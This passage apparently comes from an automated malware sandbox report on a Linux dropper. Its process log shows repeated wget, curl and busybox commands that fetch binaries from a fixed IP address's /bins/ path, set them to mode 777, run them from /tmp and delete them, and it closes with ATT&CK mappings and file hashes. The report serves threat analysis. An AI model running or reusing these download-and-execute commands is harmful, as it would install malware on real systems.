/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:863
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:867
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:876
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:882
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:894
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:900
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:906
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:914
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:920
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:926
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:929
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97